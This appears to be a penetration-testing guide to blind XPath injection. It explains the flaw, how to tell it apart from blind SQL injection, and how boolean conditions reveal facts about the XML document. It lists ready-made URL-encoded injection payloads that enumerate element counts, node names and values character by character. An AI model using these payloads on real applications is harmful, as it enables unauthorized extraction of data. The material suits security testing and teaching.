Blind XPath Injection

1. Description

An XPath Injection vulnerability occurs when an application constructs dynamic XPath queries by concatenating malicious data from an attacker and executes the resulting query. The intent of constructing the query through string concatenation is to include the user-supplied data as values in the query. The attacker can craft the user-supplied data so that the attacker's data is treated as part of the actual XPath query.

1.1 Background

XML Path Language, XPath for short, is a query language for XML documents. This query language can be used to navigate through the elements and attributes of XML documents. To do this, the XML document is shown as a tree made up of nodes.

Name of Root node – name(/*) Employee

Length of name of Root node – string-length(name(/*)) 8

Name of 1st node under root node – name(/Employee/*[1]) Name

1.2 Blind SQL or Blind XPath ?

Some of the ways that Blind XPath vulnerability occurs is from a set of true-false conditions like:

[existing-value] and 1=1

However, it can be easily misunderstood as a potential Blind SQL injection and that would lead to crafting different SQL statements to fingerprint the database (MySQL, SQL server, Oracle Database etc.) or running automated tools (sqlmap etc.). Also, some scanners do report it as a Blind SQL injection which further adds to misery.

There is 1 command (could be more) that mainly helped me distinguish to some extent as an XPath Injection:

Note: There could be some other databases that may follow the “string-length” syntax and further XPath commands should be run in-order to confirm.

1.3 Few Commands for Blind XPath Injection

Using so called "Boolenization" method the attacker may find out if the given XPath expression is True or False. It is similar to SQL injection.

For eg. Consider "en" is a true value. Below is a construct of a payload which results in True/False conditions:

  • value="en" and "1"="1" True

  • value="en" and "1"="2" False

Following are some of the commands which can be useful to retrieve the XML document:

  • Total no. of elements

en'+and+count(//*)=<value>+and+'1'='1

For eg. if total no. of elements are 100,

en'+and+count(//*)=100+and+'1'='1 True

  • Length of root node

en'+and+string-length(name(/*))=<length>+and+'1'='1

  • Length of 1st element under root node "n_root"

en'+and+string-length(name(/n_root/*[1]))=<length>+and+'1'='1

  • Name of 1st node under root node "n_root". Use characters 'a-z', '0-9' and other special characters.

en'+and+substring(name(/n_root/*[1]),1,1)='<character>'+and+'1'='1

  • Get length of value of first occurence of node "n_name"

en'+and+string-length(//name[1])=<length>+and+'1'='1

Note: If adding the root name for referring elements for eg: name(/n_root/[1]) doesn’t work. In my assessment, the root node was “soap:Envelope” and a command “name(/soap:Envelope/[1])” was not allowing to reference the child nodes of this root node. Hence, we could reference all the elements using the following syntax:

name(/*/*[1]/*[1])

Note: For all the child nodes of root node "/*", we choose the first child node "/*/*[1]" ie. book. Now, we choose the first child node of book /*/*[1]/*[1] ie. author.

The above syntax is also useful to perform automation and skipping nodes at some level (without retrieving the XML document from the start).

Last updated